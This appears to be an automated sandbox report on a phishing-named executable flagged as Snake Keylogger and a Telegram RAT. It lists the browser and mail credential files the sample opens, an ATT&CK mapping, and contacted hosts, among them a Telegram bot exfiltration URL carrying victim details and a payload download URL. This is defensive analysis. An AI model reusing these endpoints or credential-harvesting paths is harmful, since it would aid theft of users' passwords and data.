Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

1_2_0040352F

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: FedEx Shipping Confirmation.exe PID: 3660, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FedEx Shipping Confirmation.exe PID: 3660, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: FedEx Shipping Confirmation.exe PID: 3660, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	114 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FedEx Shipping Confirmation.exe	26%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsDialogs.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://eicar.org/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download	0%	Avira URL Cloud	safe
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	0%	Avira URL Cloud	safe
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	0%	Avira URL Cloud	safe
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_	0%	Avira URL Cloud	safe
https://secure.eicar.org/eicar.com;9	0%	Avira URL Cloud	safe
https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
https://www.eicar.org/download-anti-malware-testfile/:	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enWeb	0%	Avira URL Cloud	safe
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	0%	Avira URL Cloud	safe
https://office.com/setup	0%	Avira URL Cloud	safe
https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	0%	Avira URL Cloud	safe
https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft	0%	Avira URL Cloud	safe
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570	0%	Avira URL Cloud	safe
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	0%	Avira URL Cloud	safe
https://www.google.com/search?q=at	0%	Avira URL Cloud	safe
https://secure.eicar.org/eicar.com.txtD	0%	Avira URL Cloud	safe
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://setup.office.com/?ms.officeurl=setup	0%	Avira URL Cloud	safe
https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2027/08/2024%20/%2012:04:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://beta.visualstudio.net/net/sdk/feedback.asp	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://rabtbts.nl/SaOUJJyWvcSxh69.bin	0%	Avira URL Cloud	safe
https://aka.office.com/office/url/setup	0%	Avira URL Cloud	safe
https://aka.office.com/office/url/setupMicrosoft	0%	Avira URL Cloud	safe
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft	0%	Avira URL Cloud	safe
https://secure.eicar.org/eicar.com	0%	Avira URL Cloud	safe
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	0%	Avira URL Cloud	safe
https://packetstormsecurity.com/files/download/22459/BIOS320.EXE	0%	Avira URL Cloud	safe
https://www.google.com/search?q=autoit	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
https://setup.office.com/?ms.officeurl=setupMicrosoft	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
https://secure.eicar.org/eicar.com.txt/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign	0%	Avira URL Cloud	safe
https://secure.eicar.org/eicar.com/	0%	Avira URL Cloud	safe
https://www.google.com/search?q=eicar	0%	Avira URL Cloud	safe
https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf	0%	Avira URL Cloud	safe
https://www.office.com/setup	0%	Avira URL Cloud	safe
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-	0%	Avira URL Cloud	safe
https://www.eicar.org/download-anti-malware-testfile/Download	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	0%	Avira URL Cloud	safe
https://www.autoitscript.com/site/autoit/downloads/	0%	Avira URL Cloud	safe
https://office.com/setupMicrosoft	0%	Avira URL Cloud	safe
https://www.office.com/setupMicrosoft	0%	Avira URL Cloud	safe
https://www.eicar.org/download-anti-malware-testfile/	0%	Avira URL Cloud	safe
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.	0%	Avira URL Cloud	safe
https://packetstormsecurity.com/	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en(	0%	Avira URL Cloud	safe
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware
https://www.eicar.org/	0%	Avira URL Cloud	safe
https://www.autoitscript.com/site/autoit/downloads/AutoIt	0%	Avira URL Cloud	safe
https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/102.165.48.74	0%	Avira URL Cloud	safe
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ	0%	Avira URL Cloud	safe
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup	0%	Avira URL Cloud	safe
https://packetstormsecurity.com/files/22459/BIOS320.EXE.html	0%	Avira URL Cloud	safe
https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
https://www.google.com/	0%	Avira URL Cloud	safe
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue	0%	Avira URL Cloud	safe
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft	0%	Avira URL Cloud	safe
https://secure.eicar.org/eicar.com.txt	0%	Avira URL Cloud	safe
https://www.autoitscript.com/site/autoit/downloads/7	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rabtbts.nl	104.153.208.178	true	false	unknown
reallyfreegeoip.org	104.21.67.152	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2027/08/2024%20/%2012:04:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
http://rabtbts.nl/SaOUJJyWvcSxh69.bin	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/102.165.48.74	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eicar.org/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.000000003318C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com;9	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enWeb	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033185000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.eicar.org/download-anti-malware-testfile/:	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://office.com/setup	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B0000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FB5000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FF3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enlB	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033187000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=at	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com.txtD	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	FedEx Shipping Confirmation.exe, 00000003.00000002.8128175078.00000000356F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/?ms.officeurl=setup	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
